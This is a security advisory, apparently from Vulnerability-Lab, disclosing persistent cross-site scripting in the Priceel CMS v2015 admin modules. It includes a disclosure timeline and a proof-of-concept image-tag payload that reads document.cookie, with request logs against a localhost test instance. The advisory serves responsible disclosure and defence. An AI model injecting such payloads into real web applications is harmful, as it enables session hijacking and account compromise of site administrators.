Document Title:
===============
Priceel CMS - Multiple Persistent Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2297
Release Date:
=============
2022-02-18
Vulnerability Laboratory ID (VL-ID):
====================================
2297
Common Vulnerability Scoring System:
====================================
5.3
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
https://cms.priceel.com & http://uc.priceel.com/
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent cross site web vulnerabilities in the priceel cms (v2015) online-service web-application.
Affected Product(s):
====================
priceel.com
Ultimate Priceel CMS v2015 - (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2022-02-18: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Moderator Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
Multiple persistent cross site web vulnerabilities has been discovered in the priceel cms (v2015) online-service web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise
browser to web-application requests from the application-side.
The vulnerabilities are located in the `name` and `title` parameters of the (`edit_productcategory`, `edit_activity`,
`edit_brand`, `edit_photo`) products, news, brand and photos modules. Remote attackers with privileged access are able to
inject own malicious script code with persistent attack vector to compromise. The request method to inject is post and the
attack vector is persistent. After the inject the code executes on every list preview by the admin in the backend.
Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external
redirects to malicious source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Products (Add) [./photo/new]
[+] News (Add) [./activities/new]
[+] Brand (Add) [./brands/new]
[+] Galleries (Add) [./photo/new]
Vulnerable Input(s):
[+] edit_productcategory
[+] edit_activity
[+] edit_brand
[+] edit_photo
Vulnerable Parameter(s):
[+] name
[+] title
Affected Module(s):
[+] list
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with privileged user account and with low user interaction.
For security demonstration or to reproduce the persistent web validation vulnerability follow the provided information and steps below to continue.
Vulnerable Module(s):
https://priceel-cms.localhost:8080/admin/photo/new
https://priceel-cms.localhost:8080/admin/brands/new
https://priceel-cms.localhost:8080/admin/products/new
https://priceel-cms.localhost:8080/admin/activities/new
PoC: Payload
"><img/src=`evil.source` onerror=this.onerror=confirm(document.cookie)></img>
--- PoC Session Logs (POST) [edit_productcategory - name]---
http://priceel-cms.localhost:8080/admin/product_categories/10/update
Host: priceel-cms.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 488
Origin: http://priceel-cms.localhost:8080
Connection: keep-alive
Referer: http://priceel-cms.localhost:8080/admin/product_categories/10/edit
Cookie: PHPSESSID=i7hqs4q9g1k9bj7n0s9o9aocq6
edit_productcategory[categorySituation]=Ta kategoria jest podkategorią -
Leather belt&edit_productcategory[categoryLevel]=&edit_productcategory[name]="><img/src=`evil.source` onerror=this.onerror=confirm(document.cookie)></img>
&edit_productcategory[description]=test2&files[]=&edit_productcategory[id]=10
&edit_productcategory[_token]=O7ALGWHnO4fxd1FVfNfYN5AvzpDS5JziHq4VnyrhMBM&save=
-
POST: HTTP/1.1 302 Found
Content-Type: text/html; charset=UTF-8
Content-Length: 201
Connection: keep-alive
Cache-Control: private, must-revalidate
Location: /admin/product_categories/10/edit
Vary: Accept-Encoding
Content-Encoding: gzip
Server: Apache/2
--
https://priceel-cms.localhost:8080/admin/product_categories/10/evil.source
Host: priceel-cms.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: https://priceel-cms.localhost:8080/admin/product_categories/10/edit
Cookie: PHPSESSID=i7hqs4q9g1k9bj7n0s9o9aocq6
-
GET: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
server: Apache/2
Vulnerable Source: ./product_categories/ & ./product_categories/[id]/edit
<div class="panel-body row">
<div class="alert alert-success ">
<button type="button" class="close" data-dismiss="alert">×</button>
Nie zmieniono kategorii.
</div>
<div class="alert alert-success ">
<button type="button" class="close" data-dismiss="alert">×</button>
The object was successfully saved.
</div></div>
... ...
<div id="page-wrapper">
<div class="panel-body row">
</div><!--/.row -->
<header>
<h1>You're editing the object ""><img/src=`evil.source` onerror=this.onerror=confirm(document.cookie)></img>"</h1>
</header>
<div class="container-fluid">
<div class="row object-actions-ProductCategory">
<div class="col-md-12">
</div></div>
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation